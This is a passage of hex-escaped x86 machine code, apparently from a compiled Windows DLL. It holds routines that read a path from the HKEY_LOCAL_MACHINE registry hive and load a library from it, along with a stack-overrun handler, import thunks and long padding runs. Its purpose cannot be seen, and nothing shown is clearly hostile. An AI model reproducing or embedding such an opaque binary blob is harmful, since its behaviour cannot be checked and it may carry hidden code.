xD2\x3D\xB5\xA5\x31\x01\x0F\x85\x91\x01\x00\x00\x8B\x4D\xF0\x8B\x01\x8B\x40\x1C\x8D\x55\xE8\x52\x68\x60\x5D\x01\x10\x56\xFF\xD0\x85\xC0\x0F\x84\x75\x01\x00\x00\x8B\x4D\xE8\x8B\x11\x8B\x52\x20\x56\x56\x56\x8D\x45\xF4\x50\x57\x53\xFF\xD2\x85\xC0\x0F\x84\x50\x01\x00\x00\x8B\x4D\xF4\x89\x75\xFC\x8B\x01\x8B\x40\x68\x8D\x55\xFC\x52\xFF\xD0\x84\xC0\x0F\x84\x2D\x01\x00\x00\x8B\x4D\xFC\x3B\xCE\x0F\x84\x22\x01\x00\x00\x8B\x11\x8B\x42\x08\xFF\xD0\x85\xC0\x0F\x84\xFA\x00\x00\x00\x8B\x4D\xFC\x8B\x11\x8B\x52\x0C\x6A\x00\x8D\x45\xF8\x50\x8D\x45\xE0\x50\x8D\x45\x08\x50\x8D\x45\xEC\x50\x6A\x00\xFF\xD2\x84\xC0\x0F\x84\xE4\x00\x00\x00\x0F\xB7\x45\x08\x3B\xC3\x75\x10\x8B\x45\xEC\x3B\xC7\x77\x09\x8B\x4D\xE0\x03\xC1\x3B\xF8\x72\x13\x8B\x4D\xFC\x8B\x11\x8B\x42\x08\xFF\xD0\x85\xC0\x75\xB4\xE9\xA9\x00\x00\x00\x8B\x45\xF8\x85\xC0\x0F\x84\xAE\x00\x00\x00\x3D\xFF\xFF\xFF\x1F\x0F\x83\xA3\x00\x00\x00\x8D\x0C\xC5\x00\x00\x00\x00\x51\x6A\x00\xFF\x15\x88\x81\x01\x10\x50\xFF\x15\x8C\x81\x01\x10\x8B\xF0\x85\xF6\x0F\x84\x82\x00\x00\x00\x8B\x4D\xFC\x8B\x11\x8B\x52\x0C\x56\x8D\x45\xF8\x50\x6A\x00\x6A\x00\x6A\x00\x8D\x45\xDC\x50\xFF\xD2\x84\xC0\x74\x55\x2B\x7D\xEC\x3B\x3E\x72\x4E\x8B\x4D\xF8\xB8\x01\x00\x00\x00\x3B\xC8\x76\x0D\x8D\x49\x00\x3B\x3C\xC6\x72\x05\x40\x3B\xC1\x72\xF6\x8B\x44\xC6\xFC\x8B\x4D\x14\x6A\x00\x25\xFF\xFF\xFF\x00\x89\x01\x8B\x4D\xF4\x8B\x11\x8B\x52\x70\x6A\x00\x6A\x00\x8D\x45\x10\x50\x8B\x45\x0C\x50\x8B\x45\xDC\x50\xFF\xD2\x84\xC0\x74\x07\xC7\x45\xE4\x01\x00\x00\x00\x56\x6A\x00\xFF\x15\x88\x81\x01\x10\x50\xFF\x15\x90\x81\x01\x10\x8B\x4D\xFC\x8B\x01\x8B\x10\xFF\xD2\x8B\x4D\xF4\x8B\x01\x8B\x50\x40\xFF\xD2\x8B\x4D\xE8\x8B\x01\x8B\x50\x38\xFF\xD2\x8B\x4D\xF0\x8B\x01\x8B\x50\x28\xFF\xD2\x8B\x45\xE4\x5F\x5B\x5E\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x81\xEC\x18\x01\x00\x00\xA1\x0C\x70\x01\x10\x33\xC5\x89\x45\xFC\x83\x3D\x68\x71\x01\x10\x00\x74\x10\x33\xC0\x8B\x4D\xFC\x33\xCD\xE8\x6A\xE1\xFF\xFF\x8B\xE5\x5D\xC3\xA1\x2C\x70\x01\x10\x56\x8B\x35\x94\x81\x01\x10\x50\xC7\x05\x68\x71\x01\x10\x01\x00\x00\x00\xFF\xD6\x85\xC0\x0F\x85\x78\x01\x00\x00\x68\x00\x5E\x01\x10\xFF\xD6\x8B\xF0\x85\xF6\x75\x0F\x5E\x8B\x4D\xFC\x33\xCD\xE8\x2D\xE1\xFF\xFF\x8B\xE5\x5D\xC3\x53\x8B\x1D\x98\x81\x01\x10\x68\xF0\x5D\x01\x10\x56\xFF\xD3\x89\x85\xEC\xFE\xFF\xFF\x85\xC0\x75\x10\x5B\x5E\x8B\x4D\xFC\x33\xCD\xE8\x04\xE1\xFF\xFF\x8B\xE5\x5D\xC3\x57\x68\xDC\x5D\x01\x10\x56\xFF\xD3\x8B\xF8\x85\xFF\x0F\x84\x1C\x01\x00\x00\x68\xCC\x5D\x01\x10\x56\xFF\xD3\x8B\xD8\x85\xDB\x0F\x84\x0A\x01\x00\x00\x8D\x8D\xF0\xFE\xFF\xFF\x51\x6A\x01\x6A\x00\x68\x94\x5D\x01\x10\x68\x02\x00\x00\x80\xFF\x95\xEC\xFE\xFF\xFF\x85\xC0\x0F\x85\xE0\x00\x00\x00\x8B\x8D\xF0\xFE\xFF\xFF\x8D\x95\xF4\xFE\xFF\xFF\x52\x50\x8D\x85\xE8\xFE\xFF\xFF\x50\x6A\x00\x68\x78\x5D\x01\x10\x51\xFF\xD7\x85\xC0\x0F\x85\xB9\x00\x00\x00\x8B\x85\xF4\xFE\xFF\xFF\xBA\xFF\xFF\xFF\x7F\x2B\xD0\x83\xFA\x0D\x0F\x82\xA3\x00\x00\x00\x83\xC0\x0D\x3D\x04\x01\x00\x00\x0F\x83\x95\x00\x00\x00\x8D\x85\xF4\xFE\xFF\xFF\x50\x8B\x85\xF0\xFE\xFF\xFF\x8D\x8D\xF8\xFE\xFF\xFF\x51\x8D\x95\xE8\xFE\xFF\xFF\x52\x6A\x00\x68\x78\x5D\x01\x10\x50\xFF\xD7\x8B\x8D\xF0\xFE\xFF\xFF\x51\x8B\xF8\xFF\xD3\x56\xFF\x15\x7C\x81\x01\x10\x85\xFF\x75\x61\x8B\x8D\xF4\xFE\xFF\xFF\xB0\x5C\x38\x84\x0D\xF6\xFE\xFF\xFF\x74\x09\x88\x84\x0D\xF7\xFE\xFF\xFF\xEB\x07\x49\x89\x8D\xF4\xFE\xFF\xFF\x8B\x35\x2C\x70\x01\x10\x33\xC0\x8D\x8C\x0D\xF8\xFE\xFF\xFF\x8A\x14\x06\x88\x14\x01\x40\x83\xF8\x0B\x7E\xF4\x8D\x85\xF8\xFE\xFF\xFF\x50\xFF\x15\x94\x81\x01\x10\x5F\x5B\x5E\x8B\x4D\xFC\x33\xCD\xE8\xDC\xDF\xFF\xFF\x8B\xE5\x5D\xC3\x56\xFF\x15\x7C\x81\x01\x10\x5F\x33\xC0\x5B\x8B\x4D\xFC\x33\xCD\x5E\xE8\xC2\xDF\xFF\xFF\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x8B\xFF\x55\x8B\xEC\x81\xEC\x28\x03\x00\x00\xA3\x78\x72\x01\x10\x89\x0D\x74\x72\x01\x10\x89\x15\x70\x72\x01\x10\x89\x1D\x6C\x72\x01\x10\x89\x35\x68\x72\x01\x10\x89\x3D\x64\x72\x01\x10\x66\x8C\x15\x90\x72\x01\x10\x66\x8C\x0D\x84\x72\x01\x10\x66\x8C\x1D\x60\x72\x01\x10\x66\x8C\x05\x5C\x72\x01\x10\x66\x8C\x25\x58\x72\x01\x10\x66\x8C\x2D\x54\x72\x01\x10\x9C\x8F\x05\x88\x72\x01\x10\x8B\x45\x00\xA3\x7C\x72\x01\x10\x8B\x45\x04\xA3\x80\x72\x01\x10\x8D\x45\x08\xA3\x8C\x72\x01\x10\x8B\x85\xE0\xFC\xFF\xFF\xC7\x05\xC8\x71\x01\x10\x01\x00\x01\x00\xA1\x80\x72\x01\x10\xA3\x7C\x71\x01\x10\xC7\x05\x70\x71\x01\x10\x09\x04\x00\xC0\xC7\x05\x74\x71\x01\x10\x01\x00\x00\x00\x8B\x0D\x0C\x70\x01\x10\x89\x8D\xD8\xFC\xFF\xFF\x8B\x15\x10\x70\x01\x10\x89\x95\xDC\xFC\xFF\xFF\xFF\x15\xB0\x81\x01\x10\xA3\xC0\x71\x01\x10\x6A\x01\xE8\x15\xDF\xFF\xFF\x83\xC4\x04\x6A\x00\xFF\x15\x6C\x81\x01\x10\x68\x10\x5E\x01\x10\xFF\x15\x70\x81\x01\x10\x83\x3D\xC0\x71\x01\x10\x00\x75\x0A\x6A\x01\xE8\xEF\xDE\xFF\xFF\x83\xC4\x04\x68\x09\x04\x00\xC0\xFF\x15\x74\x81\x01\x10\x50\xFF\x15\x78\x81\x01\x10\x8B\xE5\x5D\xC3\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xFF\x25\x10\x82\x01\x10\xFF\x25\xB8\x81\x01\x10\xFF\x25\xBC\x81\x01\x10\xFF\x25\xC0\x81\x01\x10\xFF\x25\x68\x81\x01\x10\xFF\x25\xC4\x81\x01\x10\xFF\x25\xC8\x81\x01\x10\xFF\x25\xCC\x81\x01\x10\xFF\x25\xB4\x81\x01\x10\xFF\x25\xB0\x81\x01\x10\xFF\x25\xAC\x81\x01\x10\xFF\x25\xA8\x81\x01\x10\xFF\x25\xA4\x81\x01\x10\xFF\x25\xA0\x81\x01\x10\xFF\x25\x9C\x81\x01\x10\xFF\x25\x98\x81\x01\x10\xFF\x25\x94\x81\x01\x10\xFF\x25\x90\x81\x01\x10\xFF\x25\x8C\x81\x01\x10\xFF\x25\x88\x81\x01\x10\xFF\x25\x84\x81\x01\x10\xFF\x25\x80\x81\x01\x10\xFF\x25\x7C\x81\x01\x10\xFF\x25\x78\x81\x01\x10\xFF\x25\x74\x81\x01\x10\xFF\x25\x70\x81\x01\x10\xFF\x25\x6C\x81\x01\x10\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x